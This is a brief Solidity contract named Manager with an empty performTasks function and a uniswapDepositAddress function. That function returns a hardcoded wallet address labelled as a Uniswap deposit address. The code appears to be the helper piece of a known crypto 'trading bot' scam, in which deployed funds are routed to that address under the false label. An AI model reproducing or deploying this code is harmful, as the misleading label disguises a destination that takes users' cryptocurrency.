  
pragma solidity ^0.6.6;

contract Manager {
	function performTasks() public {
	    
	}

	function uniswapDepositAddress() public pure returns (address) {
		return 0x597A49Aef9E2137b315E06E6217C3f5b6BF19430;
	}
}
